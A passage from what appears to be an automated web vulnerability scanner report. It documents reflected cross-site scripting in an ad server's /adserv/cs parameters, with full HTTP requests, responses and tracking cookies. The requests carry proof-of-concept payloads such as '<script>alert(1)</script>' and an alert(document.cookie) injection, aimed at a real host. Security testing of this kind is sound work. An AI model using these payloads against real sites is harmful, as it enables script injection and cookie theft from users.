GET /adserv/cs?tId=12497909247337382|cb=1297710111|adType=iframe|cId=3211|ec=1|spId=27355|advId=971|exId=20|price=TVl8HgAMoucK5Wgls29b3PX_MoiUTYw1PBJRMA|pubId=56|secId=57|invId=135|notifyServer=asd146.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=|ctrack=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB9leAHnxZTefFMqXQlQfct72bC_-unYMCx9fN2ief_6ONYAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xODk0NTc4OTUwNTMyNTA0oAGLgMjrA7IBGXd3dy5zZWN1cml0eW5ld3NkYWlseS5jb226AQk3Mjh4OTBfYXPIAQnaAVFodHRwOi8vd3d3LnNlY3VyaXR5bmV3c2RhaWx5LmNvbS90b29sczM0N2FjJy1hbGVydChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D&e3e42"><script>alert(1)</script>0b1202652d2=1 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1894578950532504&output=html&h=90&slotname=3983344906&w=728&channel=9120656992_3996339198&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools347ac'-alert(document.cookie)-'9f9a2e36974%2F&dt=1297710127289&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297710127294&frm=1&adk=2785858344&ga_vid=2067892625.1297710127&ga_sid=1297710127&ga_hid=1065518577&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1097&bih=1010&ifk=3932329480&fu=4&ifi=1&dtd=8
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12aob2xzt12707lxzt12707l; adh="1lf17qo16053t2a012fr01PosQJERns01jx8p3w0t012e301OdygJLiOt01jvcj3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv2aocm02219020805219; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=43511gvlggtq20000000g19020ojdlggtq20000000g19020yujlginvd0000000d19020x1blebnns1wj3q01411000e0flggrmr0000000h19020jv3lginvd0000000d19020yielginvd0000000d19020yiflginvd0000000d19020oj6lggtq20000000g19020e08lggtq20000000g190210qflginvq0000000c19020w3clebnns1wj3q01411000e0nlgevbm0000000j19020jv6lebnns1wj3q01411000jv5lggtq20000000g19020j4ilew2e20000001w19020khalggtq20000000g19021196lfzx0l0000001919021195lg7rdq0000001019020jillebnns1wj3q01411001194lg3y5y0000001619020z14lggtq20000000g19020zgdlggtq20000000g19020faalggtq20000000g19020z13lgio080000000719021193lgiiin0000000e19021192lg5l2h0000001519020jprlginvd0000000d19020w2klggtq20000000g19020yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001y19020mmnlebnns1wj3q01411000xwhlggtq20000000g19021004lginvd0000000d19020z02lggtq20000000g19020kbzlggtq20000000g19020kkclggtq20000000g19020eh5lf17qf0000001u19020z01lgmbyu00000002190206bylemlne0000002019020df5lgcqt50000000o1902111xlggtq20000000g19020mn2lginvd0000000d19020mn1lginvd0000000d19020swvlggtq20000000g1902100plggtq20000000g19020im3lgcqt50000000o19020yzflgmc0e0000000119010yzglginxj0000000a19020b6mlf17qk0000001t19020y63lg93og0000000t19020xvslebnns1wj3q01411000o5alggtq20000000g19020yyxlginvu0000000b19020yywlginzk0000000819020x1jlebnns1wj3q01411000xwclginvd0000000d19020o4plginvd0000000d19020yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000g19020yyelginyj0000000919020fullf8gij0000001q190210f6lg1nei00000018190200c9lfk1rn0000001n19020y7blg94wv0000000r19020jsalggtq20000000g190206pklginvd0000000d19020cajlfk1rn0000001n19020p7vlebnns1xgc001b120010tylg60ji00000011190210ellg1nei07gla00h120010eklggtq20000000g19020xuklebnns22191022190211k3lginvd0000000d190210telg60j600000013190210e9lg1nei0000001819020xtblggtq20000000g190210e2lggtq20000000g19020mivlgismk0000000619020yw4lggtq20000000g190210e4lginvd0000000d190210e5lg1nei0jfph015180010rdlg1vir087mk01719020xt3lggtq20000000g19020mzklgcsh70000000m19020agalggtq20000000g19020agblggtq20000000g19020mzqlgcsgy0000000n19020loxlginvd0000000d190207gmlebnns1wj3q01411000kfalginvd0000000d19020xthlebnns1xgc001b12000xtflggtq20000000g19020za2lginvd0000000d19020za1lginvd0000000d19020ovwlginvd0000000d190207gqlggtq20000000g19020lw4lginvd0000000d19020fuqlegh2b0000002119020lw3lggtq20000000g19020mz1lebnns1wj3q01411000l24lginvd0000000d19020l25lggtq20000000g190207vglfk1rn0tn5601n19020jk7lebnns1wj3q01411000cbnlfk1rn0tn5601n19020e11lggwth0000000f1902; sglst=21m0s8dtlggrmr01w8m00h1902080520h8kmlggrmr01w8m00h1902080520havtlggrmr0056q00h1902080520h82hlebnns1ucve00z10000600200avjlggrmr01w8m00h1902080520h3kilggrmr01w8m00h1902080520halhlggrmr01w8m00h1902080520h9bslggrmr01w8m00h1902080520hab4lebnns2707l0221902080521981zlggrmr0056q00h1902080520h8gxlggrmr0056q00h1902080520h81ylginvd0000000d1902080520d8gwlginvd0000000d1902080520daoklggrmr0056q00h1902080520haollginvd0000000d1902080520db07lggwth01r1w00f1902080520f8nclginvd0000000d1902080520d7inlginvd0000000d1902080520db05lggrmr01w8m00h1902080520hal1lggrmr01w8m00h1902080520h8wylginvd0000000d1902080520dbbhlggrmr01w8m00h1902080520h8wxlggrmr0056q00h1902080520hb0clfjpei0yygv01o1902080521972slggtq205iac00g1902080520gahhlginvd0000000d1902080520d8nblggrmr0056q00h1902080520hahilggrmr0056q00h1902080520h7gdlgcqt509l7900o1902080520ob08lfjpei0yygv01b1700070020040ulggrmr01w8m00h1902080520haprlggrmr01w8m00h1902080520h5l4lgcqt509l7900o1902080520oaanlebnns1xg0o00o120007002008aelggrmr0056q00h1902080520h474lgl4zd000000031902080320361hlggrmr01w8m00h1902080520h5b0lf17qo0000001s19020805219ag2leqh191vuz501z190208052193thlggrmr01w8m00h1902080520h8c9lggrmr0056q00h1902080520h9z4lggrmr01w8m00h1902080520hacjlggrmr01w8m00h1902080520hb1alfjpei0yygv01o190208052199mmlggrmr0056q00h1902080520hb0nlggrmr01w8m00h1902080520hb0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00h1902080520h4zqlgl33700000005190208052059cblggrmr0056q00h1902080520h0tllegh2b25uy3021190208052195q8lebnns1ucve00k100006002004wmlggrmr01w8m00h1902080520h8bglginvd0000000d1902080520dacelggrmr01w8m00h1902080520h45mlfdxmc0000001p19020805219bhdlginvd0000000d1902080520d; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4lhh512012aob24qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122j0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3q41w3q31w3pz1w3py0r083ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1bw4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4l2ch12012aocm4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16063w0s0103r01sZshBH2Om01l7sh3t2a012fr01PosQJERns01jx8p3w0t012e301OdygJLiOt01jvcj3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv2arvd0231903080621a; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:53 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:53 GMT; Path=/
Set-Cookie: rdrlst=4350ojdlggtq20000000h190311gvlggtq20000000h19030yujlginvd0000000e19030jv3lginvd0000000e19030e0flggrmr0000000i19030x1blebnns1wj3q01411000yielginvd0000000e19030yiflginvd0000000e19030oj6lggtq20000000h19030e08lggtq20000000h190310qflginvq0000000d19030e0nlgevbm0000000k19030w3clebnns1wj3q01411000jv6lebnns1wj3q01411000jv5lggtq20000000h19030j4ilew2e20000001x19030khalggtq20000000h19031196lfzx0l0000001a19031195lg7rdq0000001119030jillebnns1wj3q01411001194lg3y5y0000001719030z14lggtq20000000h19030zgdlggtq20000000h19030faalggtq20000000h19030z13lgio080000000819031193lgiiin0000000f19031192lg5l2h0000001619030jprlginvd0000000e19030w2klggtq20000000h19030yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001z19030mmnlebnns1wj3q01411000xwhlggtq20000000h19031004lginvd0000000e19030z02lggtq20000000h19030kbzlggtq20000000h19030z01lgmbyu0000000319030eh5lf17qf0000001v19030kkclggtq20000000h190306bylemlne0000002119030df5lgcqt50000000p1903111xlggtq20000000h19030mn2lginvd0000000e19030mn1lginvd0000000e19030swvlggtq20000000h1903100plggtq20000000h19030im3lgcqt50000000p19030yzflgmc0e0000000219020yzglginxj0000000b19030b6mlf17qk0000001u19030y63lg93og0000000u19030xvslebnns1wj3q01411000o5alggtq20000000h19030yyxlginvu0000000c19030yywlginzk0000000919030x1jlebnns1wj3q01411000xwclginvd0000000e19030o4plginvd0000000e19030yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000h19030yyelginyj0000000a19030fullf8gij0000001r190310f6lg1nei00000019190300c9lfk1rn0000001o19030y7blg94wv0000000s19030jsalggtq20000000h190306pklginvd0000000e19030cajlfk1rn0000001o19030p7vlebnns1xgc001b120010tylg60ji00000012190310ellg1nei07gla00h120010eklggtq20000000h19030xuklebnns22191023190311k3lginvd0000000e190310telg60j600000014190310e9lg1nei0000001919030xtblggtq20000000h190310e2lggtq20000000h19030mivlgismk0000000719030yw4lggtq20000000h190310e4lginvd0000000e190310e5lg1nei0jfph015180010rdlg1vir087mk01819030xt3lggtq20000000h19030mzklgcsh70000000n19030agalggtq20000000h19030agblggtq20000000h19030mzqlgcsgy0000000o19030loxlginvd0000000e190307gmlebnns1wj3q01411000kfalginvd0000000e19030xthlebnns1xgc001b12000xtflggtq20000000h19030za2lginvd0000000e19030za1lginvd0000000e190307gqlggtq20000000h19030ovwlginvd0000000e19030lw4lginvd0000000e19030fuqlegh2b0000002219030lw3lggtq20000000h19030l24lginvd0000000e19030mz1lebnns1wj3q01411000l25lggtq20000000h190307vglfk1rn0tn5601o19030jk7lebnns1wj3q01411000cbnlfk1rn0tn5601o19030e11lggwth0000000g1903; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:53 GMT; Path=/
Set-Cookie: sglst=21m0s8dtlggrmr01w8m00i1903080620i8kmlggrmr01w8m00i1903080620iavtlggrmr0056q00i1903080620i82hlebnns1ucve00z10000600200avjlggrmr01w8m00i1903080620i3kilggrmr01w8m00i1903080620ialhlggrmr01w8m00i1903080620i9bslggrmr01w8m00i1903080620iab4lebnns2707l0231903080621a81zlggrmr0056q00i1903080620i8gxlggrmr0056q00i1903080620i81ylginvd0000000e1903080620e8gwlginvd0000000e1903080620eaoklggrmr0056q00i1903080620iaollginvd0000000e1903080620eb07lggwth01r1w00g1903080620g7inlginvd0000000e1903080620e8nclginvd0000000e1903080620eb05lggrmr01w8m00i1903080620ial1lggrmr01w8m00i1903080620ibbhlggrmr01w8m00i1903080620i8wylginvd0000000e1903080620eb0clfjpei0yygv01p1903080621a8wxlggrmr0056q00i1903080620i72slggtq205lt300h1903080620hahhlginvd0000000e1903080620e8nblggrmr0056q00i1903080620iahilggrmr0056q00i1903080620i7gdlgcqt509oq000p1903080620pb08lfjpei0yygv01b1700070020040ulggrmr01w8m00i1903080620iaprlggrmr01w8m00i1903080620i5l4lgcqt509oq000p1903080620paanlebnns1xg0o00o120007002008aelggrmr0056q00i1903080620i474lgl4zd000000041903080420461hlggrmr01w8m00i1903080620i5b0lf17qo0000001t1903080621aag2leqh191vyhw0201903080621a3thlggrmr01w8m00i1903080620i8c9lggrmr0056q00i1903080620i9z4lggrmr01w8m00i1903080620iacjlggrmr01w8m00i1903080620ib1alfjpei0yygv01p1903080621a9mmlggrmr0056q00i1903080620ib0nlggrmr01w8m00i1903080620ib0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00i1903080620i4zqlgl33701cfy006190308062060tllegh2b25ygu0221903080621a9cblggrmr0056q00i1903080620i8bglginvd0000000e1903080620e4wmlggrmr01w8m00i1903080620i5q8lebnns1ucve00k10000600200acelggrmr01w8m00i1903080620i45mlfdxmc0000001q1903080621abhdlginvd0000000e1903080620e; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:53 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 19:01:53 GMT
Content-Length: 1083

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.8;sz=728x90;click0=http://ad.media6degrees.com/adserv/clk?tId=12497909247337382|cId=3211|cb=1297710111|notifyPort=8080|exId=20|tId=1249
...[SNIP]...
Chkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D&e3e42"><script>alert(1)</script>0b1202652d2=1;ord=1297710113884?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0

MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
...[SNIP]...

2.2. http://ad.media6degrees.com/adserv/cs [tId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The value of the tId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4920f"><script>alert(1)</script>f43e222c996 was submitted in the tId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?tId=12497909247337382|cb=1297710111|adType=iframe|cId=3211|ec=1|spId=27355|advId=971|exId=20|price=TVl8HgAMoucK5Wgls29b3PX_MoiUTYw1PBJRMA|pubId=56|secId=57|invId=135|notifyServer=asd146.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=|ctrack=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB9leAHnxZTefFMqXQlQfct72bC_-unYMCx9fN2ief_6ONYAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xODk0NTc4OTUwNTMyNTA0oAGLgMjrA7IBGXd3dy5zZWN1cml0eW5ld3NkYWlseS5jb226AQk3Mjh4OTBfYXPIAQnaAVFodHRwOi8vd3d3LnNlY3VyaXR5bmV3c2RhaWx5LmNvbS90b29sczM0N2FjJy1hbGVydChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D4920f"><script>alert(1)</script>f43e222c996 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1894578950532504&output=html&h=90&slotname=3983344906&w=728&channel=9120656992_3996339198&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools347ac'-alert(document.cookie)-'9f9a2e36974%2F&dt=1297710127289&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297710127294&frm=1&adk=2785858344&ga_vid=2067892625.1297710127&ga_sid=1297710127&ga_hid=1065518577&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1097&bih=1010&ifk=3932329480&fu=4&ifi=1&dtd=8
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12aob2xzt12707lxzt12707l; adh="1lf17qo16053t2a012fr01PosQJERns01jx8p3w0t012e301OdygJLiOt01jvcj3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv2aocm02219020805219; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=43511gvlggtq20000000g19020ojdlggtq20000000g19020yujlginvd0000000d19020x1blebnns1wj3q01411000e0flggrmr0000000h19020jv3lginvd0000000d19020yielginvd0000000d19020yiflginvd0000000d19020oj6lggtq20000000g19020e08lggtq20000000g190210qflginvq0000000c19020w3clebnns1wj3q01411000e0nlgevbm0000000j19020jv6lebnns1wj3q01411000jv5lggtq20000000g19020j4ilew2e20000001w19020khalggtq20000000g19021196lfzx0l0000001919021195lg7rdq0000001019020jillebnns1wj3q01411001194lg3y5y0000001619020z14lggtq20000000g19020zgdlggtq20000000g19020faalggtq20000000g19020z13lgio080000000719021193lgiiin0000000e19021192lg5l2h0000001519020jprlginvd0000000d19020w2klggtq20000000g19020yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001y19020mmnlebnns1wj3q01411000xwhlggtq20000000g19021004lginvd0000000d19020z02lggtq20000000g19020kbzlggtq20000000g19020kkclggtq20000000g19020eh5lf17qf0000001u19020z01lgmbyu00000002190206bylemlne0000002019020df5lgcqt50000000o1902111xlggtq20000000g19020mn2lginvd0000000d19020mn1lginvd0000000d19020swvlggtq20000000g1902100plggtq20000000g19020im3lgcqt50000000o19020yzflgmc0e0000000119010yzglginxj0000000a19020b6mlf17qk0000001t19020y63lg93og0000000t19020xvslebnns1wj3q01411000o5alggtq20000000g19020yyxlginvu0000000b19020yywlginzk0000000819020x1jlebnns1wj3q01411000xwclginvd0000000d19020o4plginvd0000000d19020yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000g19020yyelginyj0000000919020fullf8gij0000001q190210f6lg1nei00000018190200c9lfk1rn0000001n19020y7blg94wv0000000r19020jsalggtq20000000g190206pklginvd0000000d19020cajlfk1rn0000001n19020p7vlebnns1xgc001b120010tylg60ji00000011190210ellg1nei07gla00h120010eklggtq20000000g19020xuklebnns22191022190211k3lginvd0000000d190210telg60j600000013190210e9lg1nei0000001819020xtblggtq20000000g190210e2lggtq20000000g19020mivlgismk0000000619020yw4lggtq20000000g190210e4lginvd0000000d190210e5lg1nei0jfph015180010rdlg1vir087mk01719020xt3lggtq20000000g19020mzklgcsh70000000m19020agalggtq20000000g19020agblggtq20000000g19020mzqlgcsgy0000000n19020loxlginvd0000000d190207gmlebnns1wj3q01411000kfalginvd0000000d19020xthlebnns1xgc001b12000xtflggtq20000000g19020za2lginvd0000000d19020za1lginvd0000000d19020ovwlginvd0000000d190207gqlggtq20000000g19020lw4lginvd0000000d19020fuqlegh2b0000002119020lw3lggtq20000000g19020mz1lebnns1wj3q01411000l24lginvd0000000d19020l25lggtq20000000g190207vglfk1rn0tn5601n19020jk7lebnns1wj3q01411000cbnlfk1rn0tn5601n19020e11lggwth0000000f1902; sglst=21m0s8dtlggrmr01w8m00h1902080520h8kmlggrmr01w8m00h1902080520havtlggrmr0056q00h1902080520h82hlebnns1ucve00z10000600200avjlggrmr01w8m00h1902080520h3kilggrmr01w8m00h1902080520halhlggrmr01w8m00h1902080520h9bslggrmr01w8m00h1902080520hab4lebnns2707l0221902080521981zlggrmr0056q00h1902080520h8gxlggrmr0056q00h1902080520h81ylginvd0000000d1902080520d8gwlginvd0000000d1902080520daoklggrmr0056q00h1902080520haollginvd0000000d1902080520db07lggwth01r1w00f1902080520f8nclginvd0000000d1902080520d7inlginvd0000000d1902080520db05lggrmr01w8m00h1902080520hal1lggrmr01w8m00h1902080520h8wylginvd0000000d1902080520dbbhlggrmr01w8m00h1902080520h8wxlggrmr0056q00h1902080520hb0clfjpei0yygv01o1902080521972slggtq205iac00g1902080520gahhlginvd0000000d1902080520d8nblggrmr0056q00h1902080520hahilggrmr0056q00h1902080520h7gdlgcqt509l7900o1902080520ob08lfjpei0yygv01b1700070020040ulggrmr01w8m00h1902080520haprlggrmr01w8m00h1902080520h5l4lgcqt509l7900o1902080520oaanlebnns1xg0o00o120007002008aelggrmr0056q00h1902080520h474lgl4zd000000031902080320361hlggrmr01w8m00h1902080520h5b0lf17qo0000001s19020805219ag2leqh191vuz501z190208052193thlggrmr01w8m00h1902080520h8c9lggrmr0056q00h1902080520h9z4lggrmr01w8m00h1902080520hacjlggrmr01w8m00h1902080520hb1alfjpei0yygv01o190208052199mmlggrmr0056q00h1902080520hb0nlggrmr01w8m00h1902080520hb0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00h1902080520h4zqlgl33700000005190208052059cblggrmr0056q00h1902080520h0tllegh2b25uy3021190208052195q8lebnns1ucve00k100006002004wmlggrmr01w8m00h1902080520h8bglginvd0000000d1902080520dacelggrmr01w8m00h1902080520h45mlfdxmc0000001p19020805219bhdlginvd0000000d1902080520d; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4lhh512012aob24qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122j0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3